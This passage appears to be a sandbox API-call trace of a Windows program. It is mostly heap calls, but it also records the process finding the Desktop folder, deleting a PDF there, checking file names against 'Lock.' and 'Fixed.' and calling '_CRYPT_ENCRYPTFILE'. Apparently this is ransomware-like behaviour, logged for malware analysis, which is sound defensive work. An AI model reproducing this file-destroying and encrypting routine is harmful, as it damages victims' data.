hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0145.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0145.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0145.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0145.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0145.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0145.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0145.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0145.196] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0145.196] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0145.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0145.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0145.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0145.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0145.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0145.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e563a8 [0145.197] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DH-NxMw2Lrt0X14_j.pdf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf", lpFilePart=0x8cedf4*="DH-NxMw2Lrt0X14_j.pdf") returned 0x2d [0145.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0145.197] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\dh-nxmw2lrt0x14_j.pdf")) returned 0x20 [0145.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e953d0, ftCreationTime.dwHighDateTime=0x1d5efa9, ftLastAccessTime.dwLowDateTime=0x4067da90, ftLastAccessTime.dwHighDateTime=0x1d5ed8c, ftLastWriteTime.dwLowDateTime=0x4067da90, ftLastWriteTime.dwHighDateTime=0x1d5ed8c, nFileSizeHigh=0x0, nFileSizeLow=0xa377, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="DH-NxMw2Lrt0X14_j.pdf", cAlternateFileName="DH-NXM~1.PDF")) returned 0xa87690 [0145.239] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\dh-nxmw2lrt0x14_j.pdf")) returned 1 [0145.241] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e953d0, ftCreationTime.dwHighDateTime=0x1d5efa9, ftLastAccessTime.dwLowDateTime=0x4067da90, ftLastAccessTime.dwHighDateTime=0x1d5ed8c, ftLastWriteTime.dwLowDateTime=0x4067da90, ftLastWriteTime.dwHighDateTime=0x1d5ed8c, nFileSizeHigh=0x0, nFileSizeLow=0xa377, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="DH-NxMw2Lrt0X14_j.pdf", cAlternateFileName="DH-NXM~1.PDF")) returned 0 [0145.245] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0145.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0145.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0145.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0145.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0145.254] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.254] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.255] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0145.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e563a8 [0145.256] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/DH-NxMw2Lrt0X14_j.pdf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf", lpFilePart=0x8cf650*="DH-NxMw2Lrt0X14_j.pdf") returned 0x2d [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0145.256] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\DH-NxMw2Lrt0X14_j.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\dh-nxmw2lrt0x14_j.pdf")) returned 0xffffffff [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0145.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0145.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.256] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0145.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dh6CM5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h6CM5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6CM5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CM5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0145.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0145.257] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0145.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0145.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0145.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0145.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b28 [0145.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0145.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dh6CM5.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h6CM5.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6CM5.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CM5.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M5.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0145.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0145.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0145.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0145.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0145.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0145.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0145.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0145.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0145.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0145.367] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0145.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0145.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0145.367] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0145.368] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0145.368] RtlAllocateHeap 